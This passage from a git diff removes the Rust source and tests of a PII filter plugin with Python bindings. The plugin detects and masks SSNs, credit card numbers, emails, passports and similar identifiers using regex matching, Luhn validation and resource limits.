DEFAULT_MAX_TEXT_BYTES); - assert_eq!(config.max_nested_depth, DEFAULT_MAX_NESTED_DEPTH); - assert_eq!(config.max_collection_items, DEFAULT_MAX_COLLECTION_ITEMS); - } - - #[test] - fn test_from_py_dict_rejects_excessive_resource_limits() { - Python::initialize(); - Python::attach(|py| { - let dict = PyDict::new(py); - dict.set_item("max_text_bytes", 100 * 1024 * 1024 + 1) - .unwrap(); - - let err = PIIConfig::from_py_dict(&dict).unwrap_err(); - assert!(err.to_string().contains("max_text_bytes")); - }); - } - - #[test] - fn test_from_py_dict_rejects_excessive_nested_depth() { - Python::initialize(); - Python::attach(|py| { - let dict = PyDict::new(py); - dict.set_item("max_nested_depth", MAX_NESTED_DEPTH_LIMIT + 1) - .unwrap(); - - let err = PIIConfig::from_py_dict(&dict).unwrap_err(); - assert!(err.to_string().contains("max_nested_depth")); - }); - } - - #[test] - fn test_from_py_dict_rejects_excessive_collection_items() { - Python::initialize(); - Python::attach(|py| { - let dict = PyDict::new(py); - dict.set_item("max_collection_items", MAX_COLLECTION_ITEMS_LIMIT + 1) - .unwrap(); - - let err = PIIConfig::from_py_dict(&dict).unwrap_err(); - assert!(err.to_string().contains("max_collection_items")); - }); - } -} diff --git a/plugins_rust/pii_filter/src/detector.rs b/plugins_rust/pii_filter/src/detector.rs deleted file mode 100644 index 561b0884d8..0000000000 --- a/plugins_rust/pii_filter/src/detector.rs +++ /dev/null @@ -1,1332 +0,0 @@ -// Copyright 2025 -// SPDX-License-Identifier: Apache-2.0 -// -// Core PII detection logic with PyO3 bindings - -use pyo3::prelude::*; -use pyo3::types::{PyAny, PyDict, PyList}; -use pyo3_stub_gen::derive::*; -use std::collections::HashMap; - -use super::config::{MaskingStrategy, PIIConfig, PIIType}; -use super::masking; -use super::patterns::{CompiledPatterns, compile_patterns}; - -/// Public API for benchmarks - detect PII in text -#[allow(dead_code)] -pub fn detect_pii( - text: &str, - patterns: &CompiledPatterns, - config: &PIIConfig, -) -> HashMap> { - let mut detections: HashMap> = HashMap::new(); - - // Use RegexSet for parallel matching - let matches = patterns.regex_set.matches(text); - - for pattern_idx in matches.iter() { - let pattern = &patterns.patterns[pattern_idx]; - - for capture in pattern.regex.captures_iter(text) { - if let Some(mat) = capture.get(0) { - let detection = Detection { - value: mat.as_str().to_string(), - start: mat.start(), - end: mat.end(), - mask_strategy: pattern - .mask_strategy - .unwrap_or(config.default_mask_strategy), - }; - - detections - .entry(pattern.pii_type) - .or_default() - .push(detection); - } - } - } - - detections -} - -/// A single PII detection result -#[derive(Debug, Clone)] -pub struct Detection { - pub value: String, - pub start: usize, - pub end: usize, - pub mask_strategy: MaskingStrategy, -} - -#[derive(Debug, Clone)] -struct CandidateDetection { - pii_type: PIIType, - value: String, - start: usize, - end: usize, - mask_strategy: MaskingStrategy, - pattern_idx: usize, -} - -/// Main PII detector exposed to Python -/// -/// # Example (Python) -/// ```python -/// from pii_filter import PIIDetectorRust -/// -/// config = {"detect_ssn": True, "detect_email": True} -/// detector = PIIDetectorRust(config) -/// -/// text = "My SSN is 123-45-6789 and email is john@example.com" -/// detections = detector.detect(text) -/// print(detections) # {"ssn": [...], "email": [...]} -/// -/// masked = detector.mask(text, detections) -/// print(masked) # "My SSN is [REDACTED] and email is [REDACTED]" -/// ``` -#[gen_stub_pyclass] -#[pyclass] -pub struct PIIDetectorRust { - patterns: CompiledPatterns, - config: PIIConfig, -} - -#[gen_stub_pymethods] -#[pymethods] -impl PIIDetectorRust { - /// Create a new PII detector - /// - /// # Arguments - /// * `config` - Python dictionary or Pydantic model with configuration - /// - /// # Configuration Keys - /// * `detect_ssn` (bool): Detect Social Security Numbers - /// * `detect_credit_card` (bool): Detect credit card numbers - /// * `detect_email` (bool): Detect email addresses - /// * `detect_phone` (bool): Detect phone numbers - /// * `detect_ip_address` (bool): Detect IP addresses - /// * `detect_date_of_birth` (bool): Detect dates of birth - /// * `detect_passport` (bool): Detect passport numbers - /// * `detect_driver_license` (bool): Detect driver's license numbers - /// * `detect_bank_account` (bool): Detect bank account numbers - /// * `detect_medical_record` (bool): Detect medical record numbers - /// * `default_mask_strategy` (str): "redact", "partial", "hash", "tokenize", "remove" - /// * `redaction_text` (str): Text to use for redaction (default: "\[REDACTED\]") - /// * `block_on_detection` (bool): Whether to block on detection - /// * `whitelist_patterns` (list[str]): Regex patterns to exclude from detection - #[new] - pub fn new(config: &Bound<'_, PyAny>) -> PyResult { - // Extract configuration from Python object (dict or Pydantic model) - let config = PIIConfig::from_py_object(config).map_err(|e| { - PyErr::new::(format!("Invalid config: {}", e)) - })?; - - // Compile regex patterns - let patterns = compile_patterns(&config).map_err(|e| { - PyErr::new::(format!( - "Pattern compilation failed: {}", - e - )) - })?; - - Ok(Self { patterns, config }) - } - - /// Detect PII in text - /// - /// # Arguments - /// * `text` - Text to scan for PII - /// - /// # Returns - /// Dictionary mapping PII type to list of detections: - /// ```python - /// { - /// "ssn": [ - /// {"value": "123-45-6789", "start": 10, "end": 21, "mask_strategy": "redact"} - /// ], - /// "email": [ - /// {"value": "john@example.com", "start": 35, "end": 51, "mask_strategy": "redact"} - /// ] - /// } - /// ``` - pub fn detect(&self, text: &str) -> PyResult> { - validate_text_size(text, self.config.max_text_bytes)?; - let detections = self.detect_internal(text); - - // Convert Rust HashMap to Python dict - Python::attach(|py| { - let py_dict = PyDict::new(py); - - for (pii_type, items) in detections { - let py_list = PyList::empty(py); - - for detection in items { - let item_dict = PyDict::new(py); - item_dict.set_item("value", detection.value)?; - item_dict.set_item("start", detection.start)?; - item_dict.set_item("end", detection.end)?; - item_dict.set_item( - "mask_strategy", - format!("{:?}", detection.mask_strategy).to_lowercase(), - )?; - - py_list.append(item_dict)?; - } - - py_dict.set_item(pii_type.as_str(), py_list)?; - } - - Ok(py_dict.into_any().unbind()) - }) - } - - /// Mask detected PII in text - /// - /// # Arguments - /// * `text` - Original text - /// * `detections` - Detection results from detect() - /// - /// # Returns - /// Masked text with PII replaced - pub fn mask(&self, text: &str, detections: &Bound<'_, PyAny>) -> PyResult { - validate_text_size(text, self.config.max_text_bytes)?; - - // Convert Python detections back to Rust format - let rust_detections = self.py_detections_to_rust(detections)?; - - // Apply masking - masking::mask_pii(text, &rust_detections, &self.config) - .map(|masked| masked.into_owned()) - .map_err(PyErr::new::) - } - - /// Process nested data structures (dicts, lists, strings) - /// - /// # Arguments - /// * `data` - Python object (dict, list, str, or other) - /// * `path` - Current path in the structure (for logging) - /// - /// # Returns - /// Tuple of (modified: bool, new_data: Any, detections: dict) - pub fn process_nested( - &self, - py: Python, - data: &Bound<'_, PyAny>, - path: &str, - ) -> PyResult<(bool, Py, Py)> { - self.process_nested_internal(py, data, path, 0) - } -} - -// Internal methods -impl PIIDetectorRust { - fn process_nested_internal( - &self, - py: Python, - data: &Bound<'_, PyAny>, - path: &str, - depth: usize, - ) -> PyResult<(bool, Py, Py)> { - if depth > self.config.max_nested_depth { - return Err(PyErr::new::(format!( - "Nested data exceeds maximum depth of {}", - self.config.max_nested_depth - ))); - } - - // Handle strings directly - if let Ok(text) = data.extract::() { - validate_text_size(&text, self.config.max_text_bytes)?; - let detections = self.detect_internal(&text); - - if !detections.is_empty() { - let masked = masking::mask_pii(&text, &detections, &self.config).map_err(|e| { - PyErr::new::(format!( - "Failed to mask nested string at '{}': {}", - path, e - )) - })?; - let py_detections = self.rust_detections_to_py(py, &detections)?; - return Ok(( - true, - masked.into_owned().into_pyobject(py)?.into_any().unbind(), - py_detections, - )); - } else { - return Ok(( - false, - data.clone().unbind(), - PyDict::new(py).into_any().unbind(), - )); - } - } - - // Handle dictionaries - if let Ok(dict) = data.cast::() { - let mut modified = false; - let mut all_detections: HashMap> = HashMap::new(); - let new_dict = PyDict::new(py); - if dict.len() > self.config.max_collection_items { - return Err(PyErr::new::(format!( - "Nested mapping exceeds maximum size of {} items", - self.config.max_collection_items - ))); - } - - for (key, value) in dict.iter() { - let key_str = key.str()?.to_string_lossy().into_owned(); - let new_path = if path.is_empty() { - key_str.clone() - } else { - format!("{}.{}", path, key_str) - }; - - let (val_modified, new_value, val_detections) = - self.process_nested_internal(py, &value, &new_path, depth + 1)?; - - if val_modified { - modified = true; - new_dict.set_item(key, new_value.bind(py))?; - - // Merge detections - let det_bound = val_detections.bind(py); - if let Ok(det_dict) = det_bound.cast::() { - for (pii_type_str, items) in det_dict.iter() { - if let Ok(type_str) = pii_type_str.extract::() - && let Ok(pii_type) = self.str_to_pii_type(&type_str) - { - let rust_items = self.py_list_to_detections(&items)?; - all_detections - .entry(pii_type) - .or_default() - .extend(rust_items); - } - } - } - } else { - new_dict.set_item(key, value)?; - } - } - - let py_detections = self.rust_detections_to_py(py, &all_detections)?; - return Ok((modified, new_dict.into_any().unbind(), py_detections)); - } - - // Handle lists - if let Ok(list) = data.cast::() { - let mut modified = false; - let mut all_detections: HashMap> = HashMap::new(); - let new_list = PyList::empty(py); - if list.len() > self.config.max_collection_items { - return Err(PyErr::new::(format!( - "Nested list exceeds maximum size of {} items", - self.config.max_collection_items - ))); - } - - for (idx, item) in list.iter().enumerate() { - let new_path = format!("{}[{}]", path, idx); - let (item_modified, new_item, item_detections) = - self.process_nested_internal(py, &item, &new_path, depth + 1)?; - - if item_modified { - modified = true; - new_list.append(new_item.bind(py))?; - - // Merge detections - let det_bound = item_detections.bind(py); - if let Ok(det_dict) = det_bound.cast::() { - for (pii_type_str, items) in det_dict.iter() { - if let Ok(type_str) = pii_type_str.extract::() - && let Ok(pii_type) = self.str_to_pii_type(&type_str) - { - let rust_items = self.py_list_to_detections(&items)?; - all_detections - .entry(pii_type) - .or_default() - .extend(rust_items); - } - } - } - } else { - new_list.append(item)?; - } - } - - let py_detections = self.rust_detections_to_py(py, &all_detections)?; - return Ok((modified, new_list.into_any().unbind(), py_detections)); - } - - // Other types: no processing - Ok(( - false, - data.clone().unbind(), - PyDict::new(py).into_any().unbind(), - )) - } - - /// Internal detection logic (returns Rust types) - fn detect_internal(&self, text: &str) -> HashMap> { - let mut detections: HashMap> = HashMap::new(); - let mut candidates = Vec::new(); - - // Use RegexSet for parallel matching (5-10x faster) - let matches = self.patterns.regex_set.matches(text); - - // For each matched pattern index, extract details - for pattern_idx in matches.iter() { - let pattern = &self.patterns.patterns[pattern_idx]; - - // Find all matches for this specific pattern - for capture in pattern.regex.captures_iter(text) { - if let Some(mat) = capture.get(0) { - let start = mat.start(); - let end = mat.end(); - let value = mat.as_str().to_string(); - - // Check whitelist - if self.is_whitelisted(text, start, end) { - continue; - } - - if !self.is_valid_detection(pattern.pii_type, &value) { - continue; - } - - candidates.push(CandidateDetection { - pii_type: pattern.pii_type, - value, - start, - end, - mask_strategy: pattern - .mask_strategy - .unwrap_or(self.config.default_mask_strategy), - pattern_idx, - }); - } - } - } - - candidates.sort_by(|a, b| { - a.start - .cmp(&b.start) - .then(b.end.cmp(&a.end)) - .then(a.pii_type.as_str().cmp(b.pii_type.as_str())) - .then(a.pattern_idx.cmp(&b.pattern_idx)) - }); - - let mut last_end = 0usize; - for candidate in candidates { - if candidate.start < last_end { - continue; - } - - last_end = candidate.end; - detections - .entry(candidate.pii_type) - .or_default() - .push(Detection { - value: candidate.value, - start: candidate.start, - end: candidate.end, - mask_strategy: candidate.mask_strategy, - }); - } - - detections - } - - /// Check if a match is whitelisted - fn is_whitelisted(&self, text: &str, start: usize, end: usize) -> bool { - let match_text = &text[start..end]; - self.patterns - .whitelist - .iter() - .any(|pattern| pattern.is_match(match_text)) - } - - /// Validate a regex hit before returning it to callers. - fn is_valid_detection(&self, pii_type: PIIType, value: &str) -> bool { - match pii_type { - PIIType::Ssn => is_valid_ssn(value), - PIIType::CreditCard => passes_luhn(value), - _ => true, - } - } - - /// Convert Python detections to Rust format - fn py_detections_to_rust( - &self, - detections: &Bound<'_, PyAny>, - ) -> PyResult>> { - let mut rust_detections = HashMap::new(); - - if let Ok(dict) = detections.cast::() { - for (key, value) in dict.iter() { - if let Ok(type_str) = key.extract::() - && let Ok(pii_type) = self.str_to_pii_type(&type_str) - { - let items = self.py_list_to_detections(&value)?; - rust_detections.insert(pii_type, items); - } - } - } - - Ok(rust_detections) - } - - /// Convert Python list to `Vec` - fn py_list_to_detections(&self, py_list: &Bound<'_, PyAny>) -> PyResult> { - let mut detections = Vec::new(); - - if let Ok(list) = py_list.cast::() { - for item in list.iter() { - if let Ok(dict) = item.cast::() { - let value: String = required_detection_field(dict, "value")?; - let start: usize = required_detection_field(dict, "start")?; - let end: usize = required_detection_field(dict, "end")?; - let strategy_str: String = required_detection_field(dict, "mask_strategy")?; - - let mask_strategy = match strategy_str.as_str() { - "partial" => MaskingStrategy::Partial, - "hash" => MaskingStrategy::Hash, - "tokenize" => MaskingStrategy::Tokenize, - "remove" => MaskingStrategy::Remove, - _ => MaskingStrategy::Redact, - }; - - detections.push(Detection { - value, - start, - end, - mask_strategy, - }); - } - } - } - - Ok(detections) - } - - /// Convert Rust detections to Python dict - fn rust_detections_to_py( - &self, - py: Python, - detections: &HashMap>, - ) -> PyResult> { - let py_dict = PyDict::new(py); - - for (pii_type, items) in detections { - let py_list = PyList::empty(py); - - for detection in items { - let item_dict = PyDict::new(py); - item_dict.set_item("value", detection.value.clone())?; - item_dict.set_item("start", detection.start)?; - item_dict.set_item("end", detection.end)?; - item_dict.set_item( - "mask_strategy", - format!("{:?}", detection.mask_strategy).to_lowercase(), - )?; - - py_list.append(item_dict)?; - } - - py_dict.set_item(pii_type.as_str(), py_list)?; - } - - Ok(py_dict.into_any().unbind()) - } - - /// Convert string to PIIType - fn str_to_pii_type(&self, s: &str) -> Result { - match s { - "ssn" => Ok(PIIType::Ssn), - "bsn" => Ok(PIIType::Bsn), - "credit_card" => Ok(PIIType::CreditCard), - "email" => Ok(PIIType::Email), - "phone" => Ok(PIIType::Phone), - "ip_address" => Ok(PIIType::IpAddress), - "date_of_birth" => Ok(PIIType::DateOfBirth), - "passport" => Ok(PIIType::Passport), - "driver_license" => Ok(PIIType::DriverLicense), - "bank_account" => Ok(PIIType::BankAccount), - "medical_record" => Ok(PIIType::MedicalRecord), - "custom" => Ok(PIIType::Custom), - _ => Err(()), - } - } -} - -fn is_valid_ssn(value: &str) -> bool { - let digits: String = value.chars().filter(|c| c.is_ascii_digit()).collect(); - if digits.len() != 9 { - return false; - } - - let area = &digits[0..3]; - let group = &digits[3..5]; - let serial = &digits[5..9]; - - area != "000" && area != "666" && area < "900" && group != "00" && serial != "0000" -} - -fn passes_luhn(value: &str) -> bool { - let digits: Vec = value - .chars() - .filter(|c| c.is_ascii_digit()) - .filter_map(|c| c.to_digit(10)) - .collect(); - - if !(13..=19).contains(&digits.len()) { - return false; - } - - let mut sum = 0u32; - let parity = digits.len() % 2; - - for (idx, digit) in digits.iter().enumerate() { - let mut value = *digit; - if idx % 2 == parity { - value *= 2; - if value > 9 { - value -= 9; - } - } - sum += value; - } - - sum.is_multiple_of(10) && has_known_card_prefix(&digits) -} - -fn has_known_card_prefix(digits: &[u32]) -> bool { - let as_string: String = digits - .iter() - .filter_map(|digit| char::from_digit(*digit, 10)) - .collect(); - let len = digits.len(); - - let prefix1 = as_string.get(0..1).unwrap_or(""); - let prefix2 = as_string.get(0..2).unwrap_or(""); - let prefix3 = as_string.get(0..3).unwrap_or(""); - let prefix4 = as_string.get(0..4).unwrap_or(""); - - matches!((prefix1, len), ("4", 13 | 16 | 19)) - || matches!((prefix2, len), ("34" | "37", 15)) - || matches!((prefix4, len), ("6011", 16 | 19)) - || matches!((prefix2, len), ("65", 16 | 19)) - || matches!(prefix2.parse::(), Ok(62)) && (16..=19).contains(&len) - || matches!(prefix2.parse::(), Ok(67)) && (12..=19).contains(&len) - || matches!((prefix2, len), ("36" | "38" | "39", 14)) - || matches!( - (prefix3, len), - ("300" | "301" | "302" | "303" | "304" | "305", 14) - ) - || matches!(prefix2.parse::(), Ok(51..=55)) && len == 16 - || matches!(prefix4.parse::(), Ok(2221..=2720)) && len == 16 - || matches!(prefix4.parse::(), Ok(3528..=3589)) && len == 16 -} - -fn validate_text_size(text: &str, max_text_bytes: usize) -> PyResult<()> { - if text.len() > max_text_bytes { - return Err(PyErr::new::(format!( - "Input exceeds maximum supported size of {} bytes", - max_text_bytes - ))); - } - - Ok(()) -} - -fn required_detection_field<'py, T>(dict: &Bound<'py, PyDict>, field: &str) -> PyResult -where - T: for<'a, 'py2> pyo3::FromPyObject<'a, 'py2>, - for<'a, 'py2> >::Error: Into, -{ - dict.get_item(field)? - .ok_or_else(|| { - PyErr::new::(format!( - "Detection is missing required field '{}'", - field - )) - })? - .extract() - .map_err(Into::into) -} - -#[cfg(test)] -mod tests { - use super::*; - use pyo3::types::PyDict; - - #[test] - fn test_detect_ssn() { - let config = PIIConfig { - detect_ssn: true, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("My SSN is 123-45-6789"); - - assert!(detections.contains_key(&PIIType::Ssn)); - assert_eq!(detections[&PIIType::Ssn].len(), 1); - assert_eq!(detections[&PIIType::Ssn][0].value, "123-45-6789"); - } - - #[test] - fn test_detect_email() { - let config = PIIConfig { - detect_email: true, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("Contact: john.doe@example.com"); - - assert!(detections.contains_key(&PIIType::Email)); - assert_eq!(detections[&PIIType::Email][0].value, "john.doe@example.com"); - } - - #[test] - fn test_no_overlap() { - let config = PIIConfig::default(); - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("123-45-6789"); - - // Should only detect once, not multiple times - let total: usize = detections.values().map(|v| v.len()).sum(); - assert!(total >= 1); - } - - #[test] - fn test_ssn_without_context_is_not_detected_for_plain_nine_digits() { - let config = PIIConfig { - detect_ssn: true, - detect_bsn: false, - detect_bank_account: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("Reference number 123456789"); - assert!(!detections.contains_key(&PIIType::Ssn)); - } - - #[test] - fn test_built_in_patterns_keep_explicit_mask_strategy() { - let config = PIIConfig { - detect_ssn: true, - detect_email: true, - detect_phone: false, - detect_ip_address: false, - default_mask_strategy: MaskingStrategy::Redact, - redaction_text: "[PII_REDACTED]".to_string(), - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("SSN: 123-45-6789 Email: john@example.com"); - - assert_eq!( - detections[&PIIType::Ssn][0].mask_strategy, - MaskingStrategy::Partial - ); - assert_eq!( - detections[&PIIType::Email][0].mask_strategy, - MaskingStrategy::Partial - ); - } - - #[test] - fn test_built_in_mask_strategy_matrix_survives_global_override() { - let config = PIIConfig { - detect_ssn: true, - detect_credit_card: true, - detect_email: true, - detect_phone: true, - detect_ip_address: true, - default_mask_strategy: MaskingStrategy::Hash, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - let detections = detector.detect_internal( - "SSN 123-45-6789 Email john@example.com Phone 555-123-4567 Card 4111-1111-1111-1111 IP 192.168.1.1", - ); - - assert_eq!( - detections[&PIIType::Ssn][0].mask_strategy, - MaskingStrategy::Partial - ); - assert_eq!( - detections[&PIIType::CreditCard][0].mask_strategy, - MaskingStrategy::Partial - ); - assert_eq!( - detections[&PIIType::Email][0].mask_strategy, - MaskingStrategy::Partial - ); - assert_eq!( - detections[&PIIType::Phone][0].mask_strategy, - MaskingStrategy::Partial - ); - assert_eq!( - detections[&PIIType::IpAddress][0].mask_strategy, - MaskingStrategy::Redact - ); - } - - #[test] - fn test_structurally_impossible_ssns_are_rejected() { - let config = PIIConfig { - detect_ssn: true, - detect_credit_card: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - detect_bsn: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - for text in [ - "SSN 000-12-3456", - "SSN 666-12-3456", - "SSN 901-12-3456", - "SSN 123-00-4567", - "SSN 123-45-0000", - ] { - let detections = detector.detect_internal(text); - assert!(!detections.contains_key(&PIIType::Ssn)); - } - } - - #[test] - fn test_valid_contextual_ssn_is_detected() { - let config = PIIConfig { - detect_ssn: true, - detect_bsn: false, - detect_bank_account: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("SSN: 123456789"); - assert!(detections.contains_key(&PIIType::Ssn)); - } - - #[test] - fn test_credit_card_requires_luhn_validation() { - let config = PIIConfig { - detect_credit_card: true, - detect_ssn: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - detect_bsn: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - assert!( - detector - .detect_internal("Card 4111-1111-1111-1111") - .contains_key(&PIIType::CreditCard) - ); - assert!( - !detector - .detect_internal("Card 4111-1111-1111-1112") - .contains_key(&PIIType::CreditCard) - ); - assert!( - !detector - .detect_internal("Card 0000-0000-0000-0000") - .contains_key(&PIIType::CreditCard) - ); - } - - #[test] - fn test_bank_account_requires_context_to_avoid_false_positives() { - let config = PIIConfig { - detect_ssn: false, - detect_bsn: false, - detect_credit_card: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: true, - detect_medical_record: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - assert!( - !detector - .detect_internal("Timestamp 20250324123045") - .contains_key(&PIIType::BankAccount) - ); - assert!( - detector - .detect_internal("Account: 123456789") - .contains_key(&PIIType::BankAccount) - ); - } - - #[test] - fn test_passport_requires_context_to_avoid_generic_ids() { - let config = PIIConfig { - detect_ssn: false, - detect_bsn: false, - detect_credit_card: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: true, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - assert!( - !detector - .detect_internal("Employee ID AB123456") - .contains_key(&PIIType::Passport) - ); - assert!( - detector - .detect_internal("Passport Number: AB123456") - .contains_key(&PIIType::Passport) - ); - } - - #[test] - fn test_passport_detection_includes_identifier_not_just_label() { - let config = PIIConfig { - detect_ssn: false, - detect_bsn: false, - detect_credit_card: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: true, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("Passport Number: AB123456"); - assert_eq!( - detections[&PIIType::Passport][0].value, - "Passport Number: AB123456" - ); - } - - #[test] - fn test_credit_card_accepts_valid_maestro_and_unionpay_numbers() { - let config = PIIConfig { - detect_credit_card: true, - detect_ssn: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - detect_bsn: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - assert!( - detector - .detect_internal("Card 6759649826438453") - .contains_key(&PIIType::CreditCard) - ); - assert!( - detector - .detect_internal("Card 6200000000000005") - .contains_key(&PIIType::CreditCard) - ); - } - - #[test] - fn test_custom_patterns_keep_explicit_mask_strategy() { - let mut config = PIIConfig { - default_mask_strategy: MaskingStrategy::Redact, - ..Default::default() - }; - config - .custom_patterns - .push(super::super::config::CustomPattern { - pattern: r"\bEMP\d{6}\b".to_string(), - description: "Employee ID".to_string(), - mask_strategy: MaskingStrategy::Partial, - enabled: true, - }); - - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - let detections = detector.detect_internal("Employee ID EMP123456"); - - assert_eq!( - detections[&PIIType::Custom][0].mask_strategy, - MaskingStrategy::Partial - ); - } - - #[test] - fn test_bsn_context_is_not_downgraded_to_ssn() { - let config = PIIConfig { - detect_ssn: true, - detect_bsn: true, - detect_credit_card: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("Customer record: BSN: 123456789"); - - assert!( - detections.contains_key(&PIIType::Bsn), - "expected BSN detection for BSN-labeled identifier" - ); - assert!( - !detections.contains_key(&PIIType::Ssn), - "did not expect SSN detection to win over BSN context" - ); - } - - #[test] - fn test_process_nested_accepts_non_string_dict_keys() { - Python::initialize(); - Python::attach(|py| { - let mut config = PIIConfig { - detect_ssn: false, - detect_email: false, - default_mask_strategy: MaskingStrategy::Redact, - ..Default::default() - }; - config - .custom_patterns - .push(super::super::config::CustomPattern { - pattern: r"\bEMP\d{6}\b".to_string(), - description: "Employee ID".to_string(), - mask_strategy: MaskingStrategy::Redact, - enabled: true, - }); - - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let data = PyDict::new(py); - data.set_item(1, "EMP123456").unwrap(); - - let result = detector.process_nested(py, &data.into_any(), ""); - assert!( - result.is_ok(), - "process_nested should not fail on non-string dict keys: {:?}", - result.err() - ); - - let (modified, new_data, detections) = result.unwrap(); - assert!(modified); - - let new_dict = new_data.bind(py).cast::().unwrap(); - assert_eq!( - new_dict - .get_item(1) - .unwrap() - .unwrap() - .extract::() - .unwrap(), - "[REDACTED]" - ); - - let det_dict = detections.bind(py).cast::().unwrap(); - assert!( - !det_dict.is_empty(), - "expected detections to be returned for masked value" - ); - }); - } - - #[test] - fn test_detect_rejects_oversized_input() { - Python::initialize(); - Python::attach(|py| { - let config = PIIConfig { - detect_ssn: true, - ..Default::default() - }; - let max_text_bytes = config.max_text_bytes; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - let oversized = "a".repeat(max_text_bytes + 1); - - let err = detector.detect(&oversized).unwrap_err(); - assert!(err.is_instance_of::(py)); - }); - } - - #[test] - fn test_default_detector_accepts_inputs_larger_than_256k() { - Python::initialize(); - Python::attach(|_| { - let config = PIIConfig { - detect_ssn: true, - detect_bsn: false, - detect_credit_card: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - let text = format!("{} SSN: 123-45-6789", "x".repeat(300 * 1024)); - - assert!(detector.detect(&text).is_ok()); - }); - } - - #[test] - fn test_longer_overlap_wins_over_registration_order() { - let mut config = PIIConfig { - detect_bsn: true, - detect_ssn: false, - detect_credit_card: false, - detect_email: false, - detect_phone: false, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - ..Default::default() - }; - config - .custom_patterns - .push(super::super::config::CustomPattern { - pattern: r"\bBSN\b".to_string(), - description: "Short custom token".to_string(), - mask_strategy: MaskingStrategy::Redact, - enabled: true, - }); - - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - let detections = detector.detect_internal("BSN: 123456789"); - - assert!(detections.contains_key(&PIIType::Bsn)); - assert_eq!(detections[&PIIType::Bsn][0].value, "BSN: 123456789"); - assert!(!detections.contains_key(&PIIType::Custom)); - } - - #[test] - fn test_bare_nine_digit_ssn_with_label_is_detected() { - let config = PIIConfig { - detect_ssn: true, - detect_bsn: false, - detect_phone: false, - detect_bank_account: false, - ..Default::default() - }; - let patterns = compile_patterns(&config).unwrap(); - let detector = PIIDetectorRust { patterns, config }; - - let detections = detector.detect_internal("SSN: 123456789"); - assert!(detections.contains_key(&PIIType::Ssn)); - } - - #[test] - fn test_detect_uses_configurable_text_limit() { - Python::initialize(); - Python::attach(|py| { - let config = PyDict::new(py); - config.set_item("detect_ssn", true).unwrap(); - config.set_item("max_text_bytes", 8).unwrap(); - - let detector = PIIDetectorRust::new(&config.into_any()).unwrap(); - let err = detector.detect("123456789").unwrap_err(); - - assert!(err.is_instance_of::(py)); - }); - } - - #[test] - fn test_process_nested_uses_configurable_collection_limit() { - Python::initialize(); - Python::attach(|py| { - let config = PyDict::new(py); - config.set_item("detect_email", true).unwrap(); - config.set_item("max_collection_items", 1).unwrap(); - - let detector = PIIDetectorRust::new(&config.into_any()).unwrap(); - let data = PyList::empty(py); - data.append("a@example.com").unwrap(); - data.append("b@example.com").unwrap(); - - let err = detector - .process_nested(py, &data.into_any(), "") - .unwrap_err(); - assert!(err.is_instance_of::(py)); - }); - } - - #[test] - fn test_detects_plus_prefixed_international_phone_number() { - let config = PIIConfig { - detect_ssn: false, - detect_bsn: false, - detect_credit_card: false, - detect_email: false, - detect_phone: true, - detect_ip_address: false, - detect_date_of_birth: false, - detect_passport: false, - detect_driver_license: false, - detect_bank_account: false, - detect_medical_record: false, - ..Default::default() - }; - let patterns = 